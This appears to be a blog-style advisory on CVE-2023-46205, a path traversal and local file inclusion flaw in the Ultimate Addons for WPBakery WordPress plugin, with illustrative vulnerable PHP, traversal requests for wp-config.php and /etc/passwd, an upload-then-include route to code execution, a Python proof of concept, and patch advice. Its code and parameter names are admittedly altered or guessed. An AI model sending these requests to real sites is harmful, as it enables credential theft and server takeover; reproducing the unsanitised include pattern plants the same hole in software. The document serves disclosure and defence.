CVE-2023-46205 - Path Traversal in Ultimate Addons for WPBakery Page Builder – What You Need to Know

If you run a WordPress website, you probably know about drag-and-drop page builders like WPBakery. Many websites rely on plugins to make building pages easier, and "Ultimate Addons for WPBakery Page Builder" by Brainstorm Force is one of the most popular. But did you know that from its first release all the way through version 3.19.14, it had a critical vulnerability? That’s CVE-2023-46205, a classic “path traversal” bug, which lets attackers read any file on your server… and sometimes execute malicious PHP.

What is CVE-2023-46205?

CVE-2023-46205 is a “Path Traversal” vulnerability in Ultimate Addons for WPBakery Page Builder, a WordPress plugin with over 700,000 installations [1]. This means it’s possible for someone to trick the plugin into accessing files outside the folder it’s supposed to use — including core WordPress files, configuration files, or any readable file on your web server.

Affected Versions:
All versions up to (and including) 3.19.14

Impact:
*PHP Local File Inclusion* — attackers use this to read any file or even execute code if they can inject PHP somewhere on the site.

How Does the Vulnerability Work?

The issue comes down to how the plugin handles file paths. If user input is not properly “sanitized” (checked for dangerous stuff), attackers can supply paths like ../../../wp-config.php to access sensitive files.

Typical vulnerable code example:
(Some details and file/function names changed for clarity and security)

// Vulnerable endpoint or AJAX handler
if (isset($_GET['template'])) {
    $template = $_GET['template']; // User input!
    include '/var/www/html/wp-content/plugins/ultimate-addons/templates/' . $template . '.php';
}

With no input checks, an attacker could visit

https://victimsite.com/wp-admin/admin-ajax.php?action=load_template&template=../../../../wp-config

And the plugin would include

/var/www/html/wp-content/plugins/ultimate-addons/templates/../../../../wp-config.php

Which PHP interprets as the real wp-config.php file — leaking your database credentials or worse.

Real World Attack Example

Let’s say your site allows users to choose a “block template” via a GET parameter. But the template filename is inserted directly into a PHP include().

$template = $_GET['ua_template']; // example param
include "templates/" . $template . ".php";

Malicious request

GET /wp-admin/admin-ajax.php?action=ua_load_template&ua_template=../../../../../../etc/passwd HTTP/1.1
Host: victimsite.com

If allowed, the plugin includes and displays the server's /etc/passwd file! If the attacker can control upload folders, they might also get the plugin to execute their own PHP payload.

Exploit via LFI + Upload

1. Attacker uploads file /wp-content/uploads/malicious.php with PHP code.

`

GET /wp-admin/admin-ajax.php?action=ua_load_template&ua_template=../../uploads/malicious

The plugin includes their PHP file, and the attacker's code runs on your server.

## Detailed Exploit / PoC

Here’s a basic proof-of-concept exploit for testing (do NOT attack live sites without permission):

import requests

url = "https://victimsite.com/wp-admin/admin-ajax.php";
payload = {
    "action": "ua_load_template",  # check the actual parameter name
    "ua_template": "../../../../wp-config"
}
r = requests.get(url, params=payload)
print(r.text)  # Should show database credentials if vulnerable

How to Protect Your Site

- Update Ultimate Addons for WPBakery Page Builder immediately! (Version 3.19.15+ is not affected.)

Use security plugins or firewalls to block suspicious requests.

If you can't update:
Consider removing the plugin temporarily or disabling any custom template loading features.

References & More Reading

- CVE-2023-46205 Details on NVD
- Wordfence Advisory
- Official Plugin Page
- PHP LFI Vulnerability Explained (Acunetix)

Conclusion

This vulnerability highlights why it’s so important to sanitize all user input — especially when loading files. If your website uses Ultimate Addons for WPBakery Page Builder, double-check your version, update if necessary, and keep an eye out for any suspicious activity.

Stay safe!
If you have questions about how this works, feel free to ask below.

Disclaimer

This post is for educational purposes only. Never test vulnerabilities on sites you do not own or have explicit permission to test.


Footnotes:
[1] Ultimate Addons usage stats
[2] Official CVE listing

Timeline

Published on: 05/17/2024 09:15:09 UTC
Last modified on: 05/17/2024 18:36:05 UTC